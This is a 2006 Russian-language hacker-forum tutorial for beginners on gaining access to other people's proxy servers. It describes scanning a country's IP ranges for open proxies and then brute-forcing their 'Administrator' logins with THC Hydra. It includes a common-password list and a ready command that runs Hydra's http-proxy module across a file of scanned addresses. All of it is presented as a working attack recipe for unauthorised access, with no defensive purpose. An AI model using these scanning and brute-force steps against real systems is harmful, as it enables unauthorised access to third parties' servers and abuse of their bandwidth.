[intro]
Обычно большинство из пользователей, достают прокси для брута, в публичных местах или покупают.
Но есть более разумный способ! :) Какой сприсите вы? Ответ прсть насканить самому... ;)
[Осматриваемся]
Итак для начала опредилимся в какой зоне находится наш дедик? К примеру дедик находится в зоне br (Бразилия) тогда я и буду искать проксы именно в данном регионе.
Идем на сайт http://www.completewhois.com/statist...ntry/rirstats/ и смотрим диапазоны ip адресов нужные нам. Как видите диапазон не из коротких :( и сканить мы его будем не одни сутки.
Здесь нам помогут публичные сайты выкладывающие проксы... К примеру шагаем на сайт http://www.aliveproxy.com и выбираем из списка нужный нам регион, хм.. не густо но зато мы видим на каких диапазонах сидят проксы :).
[Сканер]
Хорошо начало есть, а теперь нам нужен добротный сканер портов, в сети их огромное множество и каждый по своему хорош, но этого нам мало, нам нужен быстрый и главное качественный сканер. Многие из нас привыкли к одним сканерам, а другие предпочитают другие... Мой выбор пал на программу
Dsns 10 , до него я испробовал огромное кол-во сканеров в которых по своему разочаровывался :(
Angryip - к примеру, часто не видел проксов там где они есть,
ProxyHunter - слишком медленный, но зато чекер из него самый рульный :),
SuperScan - то-же глюкнутный :D. Теперь настало время для портов, хотя порты мы можем прпустить т.к. вы уже заметили, что всеми любимый ай-пи-ди(
IPDBrut - всех версий) работает на стандартных портах -
80, 3128, 6588, 8080.
но всеже мы опять пойдем на http://www.aliveproxy.com и посмотрим какие обычно порты используют Бразильцы :).
Многое в данном посте пропущено, думаю дальше вам обьяснять не надо и вы сами допрете что делать...
[Подбираем пароль к PROXY]
Итак мы добыли проксов, с чем я вас и поздравляю! ;) Но всеравно хочется добыть быстрый прокс, с авторизацией т.е. вводишь логин, пасс и сидишь один с нормальной скоростью. Итак приступим. Данный способ не очень прост и требует много терпения, и времени.Так что не думайте. что прочитав данную статью вы сразу станете обладателем хорошего прокси сервера. Брутить мы будем диапазон ip - адрессов на один распрастраненный логин Administrator.
[Начнем]
Но наш выбор сегодня падет на программу hydra от команды
THC
Hydra –
это настоящая находка для хакера. Она умеет подбирать пароли к SSH, FTP,
MySQL, MS-SQL, POP3, IMAP, HTTP/HTTPS basic-auth, без проблем ломает пассы к
маршрутизаторам cisco и т.д.
Как видишь данная програма обладает целым набором хороших качеств, и может подобрать пароль к многим протоколам. Теперь нам нужен Password-лист (файл с паролями). Его можно создать как самому или скачать с любого хак ресурса.
В данной статье мы будем работать с
win32 версией программы т.к те кто использует OS семейства
LINUX или шелл то они уже знают че по чем. ;)
Для начала скачаем ее с офф. сайта
THC
распакуем ее к примеру в директорию :
C:\hydra Примечание: Программа работает из командной строки
Как запустить командную строку ты наверное уже знаешь ;), а если нет то:
Пуск\Выполнить\cmd.exe
Запустили, теперь переходим в папку с гидрой при помощи команды cd в данном случае
cd C:\hydra
запускаем гидру hydra.exe где она выведет нам полный список ключей и протоколов
Цитата:
C:\hydra>hydra.exe
Hydra v5.2 [http://www.thc.org] (c) 2006 by van Hauser / THC <vh@thc.org>
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]
Options:
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: [telnet ftp pop3 imap smb
smbnt http-head http-get https-head https-get http-proxy cisco cisco-enable vnc
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs
snmp rsh cvs svn icq sapr3 ssh2 smtp-auth pcanywhere teamspeak sip vmauthd]
OPT some service modules need special input (see README!)
Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org
|
где мы видим присутствие протокола
http-proxy. Ну что же теперь создадим Password-list под названием pass.txt и наполним его наиболее распространенными паролями.
К примеру:
Цитата:
123
1234
12345
123456
1234567
!@#
!@#$
!@#$%
!@#$%^
!@#$%^&
qwerty
qwert
qwer
pass
password
Password
pAsSwOrD
PaSsWoRd
/.,
/.,m
/.,mn
/.,mnb
|
ну и так далее, все зависит от вашей фантазии, или качайте публичные пасс-листы из интернета.
теперь вбиваем:
hydra -s 8080 -l Administrator -P pass.txt -t 16 -M ip.txt http-proxy
Где
-s PORT if the service is on a different default port, define it here (порт)
-l LOGIN or
-L FILE login with LOGIN name, or load several logins from FILE (Логин который мы будем брутить)
-L лист с логинами.
-p PASS or
-P FILE try password PASS, or load several passwords from FILE
(
-p один пасс,
-Р пасслист)
-t TASKS run TASKS number of connects in parallel (default: 16) кол-во потоков, по умолчанию 16.
-M FILE server list for parallel attacks, one entry per line (лист адрессов для перебора)
з.ы. Статья для новичков, многое пропущенно указаны лишь принцип работы брута =))) УДАЧНОГО БРУТА!
Используемый софт
1)
СканерDsns10
2)
Сканер и чеккер ProxyHunter
3)
Brute THC-HYDRA
by te$t 2006г.